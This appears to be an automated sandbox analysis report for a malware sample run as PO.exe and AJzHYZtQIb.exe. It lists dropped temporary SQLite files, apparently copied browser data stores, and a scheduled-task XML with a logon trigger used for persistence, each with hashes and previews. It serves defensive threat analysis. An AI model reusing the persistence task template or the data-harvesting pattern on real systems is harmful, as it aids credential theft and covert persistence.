SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37BB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37CB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37DC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37FC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp380D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4825.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4836.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4856.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4876.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4887.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp61B0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1583
Entropy (8bit):	5.11800490128808
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
MD5:	1CA22DCFBADB6107577BDA22B32BD86C
SHA1:	69BE9304F80294A061CB43DDDD505BB4C09ABBA9
SHA-256:	F3B7B692FA1DA9406F506EA7728E20E9094D6CE13F829D361F78189BCEDAA573
SHA-512:	36D5DB6D5A980A1C60D98A12C9407FB7B28B95FCB285D10D9DA3222C72C5BF4523E864FD394371320A13185D1F1A96A0A1F33B9610169E233F05A9ECD595CC58
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp621E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp623F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp624F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6270.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6280.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6291.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7F38.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7F58.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7F78.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7F89.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7F8A.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7F9B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8574.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1583
Entropy (8bit):	5.11800490128808
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
MD5:	1CA22DCFBADB6107577BDA22B32BD86C
SHA1:	69BE9304F80294A061CB43DDDD505BB4C09ABBA9
SHA-256:	F3B7B692FA1DA9406F506EA7728E20E9094D6CE13F829D361F78189BCEDAA573
SHA-512:	36D5DB6D5A980A1C60D98A12C9407FB7B28B95FCB285D10D9DA3222C72C5BF4523E864FD394371320A13185D1F1A96A0A1F33B9610169E233F05A9ECD595CC58
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp9838.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9858.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
